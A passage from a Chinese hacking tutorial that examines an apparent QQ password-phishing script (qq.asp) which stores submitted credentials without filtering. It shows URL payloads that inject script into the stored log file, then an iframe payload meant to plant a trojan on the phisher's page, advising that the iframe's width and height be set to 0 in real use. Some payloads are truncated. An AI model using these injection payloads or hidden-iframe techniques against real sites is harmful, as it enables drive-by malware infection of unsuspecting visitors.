|
所有的代码也就是这些..程序并未做任何过滤..和处理..也就是说..只要满足qq.asp?QQNumber=123&QQPassWord=123 就回返回 "发送成功!"的提示.
http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=123图11
这就证明了QQNumber=123&QQPassWord=123这两个我们是可以自己定义的..如果我们写入的不是数字..而且一段脚本代码呢?会不会执行呢..让我们来试下
http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=< ... quot;fhod")</script>
图12
插入代码成功...我们来看下
http://www.ciker.org/soft/q7.txt的源文件又是什么样的..
图13
再次证明对提交的数据是无任何限制的...我们完全可以自己发挥想象.插入任何代码都可以...
如果想反挂马的话..我们就可以提交以下数据
以下是引用片段:
http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=<iframe%20&# ... 20width=480%20height=480></iframe> |
图14
当然我这里把width和height设置为480只是为了方便演示..实际挂马中要改为0
好了..现在我们就可以给作者一个惊喜去了..图15
上一页 [1] [2] [3] [4] 下一页 |
